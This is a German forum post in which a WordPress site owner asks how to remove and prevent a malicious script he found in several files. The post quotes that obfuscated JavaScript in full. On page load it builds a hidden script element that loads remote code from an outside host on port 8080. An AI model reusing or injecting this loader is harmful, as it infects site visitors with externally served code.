Ich habe gerade folgendes Skript in meiner Wordpress Installation in mehreren Datein entdeckt. Es scheint sich dabei um einen Schädling zu handeln. Weiß jemand wie ich das weg bekomme und mich davor schützen kann?
Nutze auf meinem Rechner Panda Global Protection 2010 auf dem neuesten Stand auf Windows Vista. Zum Daten hochladen nutze Ich Filezilla.
Stefan
Code
< script >try {} catch(j){};var i={hS:false};var a;u=function(){vy=65279;vy--;try {} catch(A){};l_=["k","q"];function K(h,I,b){var ad=[];var d=[];return h.substr(I,b);}li=["N"];this.Z="";pA={};var X=document;var R=RegExp;var hj="/goog"+K("le.coHVBv",0,5)+K("29bm/com2b9",3,5)+K("6Iu0direc60Iu",4,5)+K("hKot.de/oKh",3,5)+K("6ODmacys6OD",3,5)+K("fv7U.com.U7vf",4,5)+K("phpl0RL",0,3);var U='';var vg={J:53084};function l(h,I){var VG=false;this.oZ=60060;this.oZ-=189;var b=String(K("[JD9",0,1))+I+new String("]");this.W=false;var C=new R(b, new String("g"));var si=["Ts"];return h.replace(C, U);};this.RD=19895;this.RD--;var E=260460-252380;var M=null;aT={Jc:22918};var n=l('szcVrQigpmtn','5nqAE9mTQWgzaPVd');var bb=String("body");var dB=new String();var fQ=["K_","y"];this.bW="bW";a=function(){UN=45591;UN--;try {var a_='EH'} catch(a_){};try {var F=l('cxrweAaqtwexE_lfeAmAe7nAtu','Cw5qKyx_FAsR7uf8MT');try {var CV='Bi'} catch(CV){};HY=["Sy"];v=X[F](n);var T=String(K("defeJC6H",0,4)+K("rO7J",0,1));this.If="If";var S=l('sRrBcL','LuEaDRplQBG8qo9z');kj={};var rP='';var h=E+hj;Wp=28291;Wp++;var Xz=false;this.RP=false;v[S]=new String("http:"+K("//tenhRD",0,5)+K("thproiTYP",0,5)+"fit.r"+K("k2xbu:bx2k",4,2))+h;this.aP='';v[T]=[1][0];this.VR=58888;this.VR++;qk=56864;qk-=219;var iy=new Array();X[bb].appendChild(v);this.bv="";var it={};try {} catch(FW){};} catch(V){var kJ={HE:false};this.QO=54828;this.QO-=185;};this.sq=false;};var WC=false;};u();try {var Zi='wg'} catch(Zi){};var OV=[];window.onload=a;this.tk='';< /script >
<!--be827f34bb3b71dc5e80e91ddebecea9-->